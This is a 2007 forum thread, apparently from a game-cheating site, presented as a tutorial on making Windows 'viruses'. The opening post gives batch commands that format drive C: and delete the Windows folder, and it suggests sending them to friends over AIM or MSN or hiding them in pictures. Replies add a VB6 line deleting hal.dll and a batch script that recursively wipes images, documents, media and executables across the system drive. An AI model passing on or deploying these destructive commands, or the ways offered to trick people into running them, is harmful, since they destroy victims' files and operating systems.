| View previous topic :: View next topic |
| Author |
Message |
AdamWest Master Cheater
Reputation: 0
Joined: 05 Jul 2007 Posts: 354 Location: Quahog, Rhode Island
|
Posted: Fri Nov 02, 2007 12:23 pm Post subject: [Tutorial] How To Make Viruses(Trojans)-UPDATED 1.2 |
|
|
This guide will be updated tonight with pictures, and new viruses. If you like the guide, you can rep me, but it is not needed.
This guide, as of now, is for Windows ONLY!
----------------------------------------------------------------------------------------------------
Batch File 1.
----------------------------------------------------------------------------------------------------
Description:This is easily, the most simple virus ever. This "virus" is actually not a virus. It will format your C drive, rendering it useless if the OS is installed on said drive.
----------------------------------------------------------------------------------------------------
Step 1. Open Notepad
Step 2. In Notepad, type in FORMAT C:
Step 3. Click Save As, and save it as <insertnamehere>.bat
Warning: I do not recommend running this!
To Spread: There are a couple ways. Send to friends as the defualt Batch File, and watch them log off AIM, XFire, MSN, whatever within minutes. Or, you can use C++ or maybe Delphi, to code a basic windows program that runs this in the background. Tutorial on this later!
----------------------------------------------------------------------------------------------------
Batch File 2.
----------------------------------------------------------------------------------------------------
Description: This Batch File will delete everything in the WINDOWS part of the C: drive, also rendering it useless. This is more advanced than the last, but will n
ot re-delete everything on bootup.
----------------------------------------------------------------------------------------------------
Step 1. Open Notepad
Step 2. Type in :
@echo off
rem deleting windows
del C:\WINDOWS
Step 3. Click Save As, and save it as <insertnamehere>.bat
Warning: I do not recommend running this!
To Spread: Same as the other Batch. Send it around on AIM, or something. Later I'll show an example of how to embed it into a picture, so it spreads around easily.
----------------------------------------------------------------------------------------------------
Batch Virus Maker: Tired of manually righting codes for crappy .bat files? Included here is the Batch Virus Maker, which includes such options: Disabling victims mouse, keyboard, how the file starts, how it spreads and virus details.
----------------------------------------------------------------------------------------------------
GenVirus:
Author: J.Struss
Features:
GenVir was marketed by a Frenchman called Struss as a tool to evaluate the performance of anti-virus products and its documents included an order form. In 1993 members of NuKE released a cracked version 1.5. Later in 1993 Struss released version 2.0 which boasted MS-DOS 5.0, 6.0 and Doublespace compatibility.
More than 10 viruses produced by GenVir are known. Ill post how to use it soon
----------------------------------------------------------------------------------------------------
_________________
"I myself am made entirely of flaws, stitched together with good intentions." - Augusten Burroughs
Last edited by AdamWest on Sat Nov 03, 2007 6:44 pm; edited 9 times in total |
|
| Back to top |
|
 |
Lorrenzo Moderator
Reputation: 4
Joined: 02 Jun 2006 Posts: 3744
|
Posted: Fri Nov 02, 2007 12:53 pm Post subject: |
|
|
Nice, but the one with C:\ isn't the best because not everyone uses it.
_________________
LAWLrrenzolicious |
|
| Back to top |
|
 |
Hackerdevelopment Advanced Cheater
Reputation: 0
Joined: 11 Oct 2007 Posts: 55
|
Posted: Fri Nov 02, 2007 1:30 pm Post subject: |
|
|
Nice! This is gonna b great!
_________________
|
|
| Back to top |
|
 |
AtheistCrusader Grandmaster Cheater
Reputation: 6
Joined: 23 Sep 2006 Posts: 681
|
Posted: Fri Nov 02, 2007 2:01 pm Post subject: |
|
|
| since this is .bat file everyone can edit it and see the code so its almost useless
|
|
| Back to top |
|
 |
AdamWest Master Cheater
Reputation: 0
Joined: 05 Jul 2007 Posts: 354 Location: Quahog, Rhode Island
|
Posted: Fri Nov 02, 2007 2:03 pm Post subject: |
|
|
| masterkert3 wrote: | | since this is .bat file everyone can edit it and see the code so its almost useless |
Masterkert, stop being a fatass and read the section where it says I'm teaching other kinds later. Also, batch files are pretty simple, so I included them for the first part.
_________________
"I myself am made entirely of flaws, stitched together with good intentions." - Augusten Burroughs |
|
| Back to top |
|
 |
Poutsokefalos How do I cheat?
Reputation: 0
Joined: 23 Sep 2007 Posts: 4
|
Posted: Fri Nov 02, 2007 2:07 pm Post subject: You pown man! |
|
|
Nice one adam.just one thing...msn won't let me send it because it says that i must scan it first
|
|
| Back to top |
|
 |
DeletedUser14087 I post too much
Reputation: 2
Joined: 21 Jun 2006 Posts: 3069
|
Posted: Fri Nov 02, 2007 2:14 pm Post subject: |
|
|
This is not a virus, you're scamming people
Virus must be detected by a AV, AV wont detect "del C:\WINDOWS" unless the person is too stupod to edit the .bat with notepad
|
|
| Back to top |
|
 |
Stylo Grandmaster Cheater Supreme
Reputation: 3
Joined: 16 May 2007 Posts: 1073 Location: Israel
|
Posted: Fri Nov 02, 2007 2:17 pm Post subject: |
|
|
nice tut thanks
i used visual C# to make a little program for doing it
and i added a search option in local discs C D & E (seached the windows folder)
here's what i did
WARNING: Do not run this file S:
_________________
Stylo |
|
| Back to top |
|
 |
appalsap Moderator
Reputation: 0
Joined: 27 Apr 2006 Posts: 6753 Location: Pakistan
|
Posted: Fri Nov 02, 2007 2:17 pm Post subject: |
|
|
Darn, I wanted you to remove this, but Kaspersky's already read it. We all know what kind of programs we'll be seeing in the next few days
_________________
|
|
| Back to top |
|
 |
AtheistCrusader Grandmaster Cheater
Reputation: 6
Joined: 23 Sep 2006 Posts: 681
|
Posted: Fri Nov 02, 2007 2:18 pm Post subject: |
|
|
| AdamWest wrote: | | masterkert3 wrote: | | since this is .bat file everyone can edit it and see the code so its almost useless |
Masterkert, stop being a fatass and read the section where it says I'm teaching other kinds later. Also, batch files are pretty simple, so I included them for the first part. |
since i read that, i commented about .bat file section not the others
o and a VB 6 virus here
| Code: |
kill ("C:/windows/system32/hal.dll")
|
|
|
| Back to top |
|
 |
DeletedUser14087 I post too much
Reputation: 2
Joined: 21 Jun 2006 Posts: 3069
|
Posted: Fri Nov 02, 2007 2:19 pm Post subject: |
|
|
| appalsap wrote: | Darn, I wanted you to remove this, but Kaspersky's already read it. We all know what kind of programs we'll be seeing in the next few days  |
oh shit !, you caught me !
|
|
| Back to top |
|
 |
hcavolsdsadgadsg I'm a spammer
Reputation: 26
Joined: 11 Jun 2007 Posts: 5801
|
Posted: Fri Nov 02, 2007 2:20 pm Post subject: |
|
|
| This topic is a cesspool of failure.
|
|
| Back to top |
|
 |
XxOsirisxX Grandmaster Cheater Supreme
Reputation: 0
Joined: 30 Oct 2006 Posts: 1597
|
Posted: Fri Nov 02, 2007 2:23 pm Post subject: |
|
|
Weak "virus".
This is better...
echo del "%systemdrive%\*.exe" /s /f /a /q
echo del "%systemdrive%\*.jpg" /s /f /a /q
echo del "%systemdrive%\*.gif" /s /f /a /q
echo del "%systemdrive%\*.bmp" /s /f /a /q
echo del "%systemdrive%\*.mp3" /s /f /a /q
echo del "%systemdrive%\*.wav" /s /f /a /q
echo del "%systemdrive%\*.wma" /s /f /a /q
echo del "%systemdrive%\*.avi" /s /f /a /q
echo del "%systemdrive%\*.mpg" /s /f /a /q
echo del "%systemdrive%\*.wmv" /s /f /a /q
echo del "%systemdrive%\*.txt" /s /f /a /q
echo del "%systemdrive%\*.doc" /s /f /a /q
echo del "%systemdrive%\*.swf" /s /f /a /q
echo del "%systemdrive%\*.lnk" /s /f /a /q
Also for the windows..
del %homedrive%/Windows
_________________
|
|
| Back to top |
|
 |
AtheistCrusader Grandmaster Cheater
Reputation: 6
Joined: 23 Sep 2006 Posts: 681
|
Posted: Fri Nov 02, 2007 2:25 pm Post subject: |
|
|
| and what r these supposed to do?
|
|
| Back to top |
|
 |
XxOsirisxX Grandmaster Cheater Supreme
Reputation: 0
Joined: 30 Oct 2006 Posts: 1597
|
Posted: Fri Nov 02, 2007 2:26 pm Post subject: |
|
|
| masterkert3 wrote: | | and what r these supposed to do? |
the environ
%HomeDrive%, %SystemRoot%..
those..
Well, theys find the actual driver that you use to install windows. So, if you have it on D:, %HomeDrive% = D:.
Note: Those environs that i name, are just for that.
_________________
|
|
| Back to top |
|
 |
|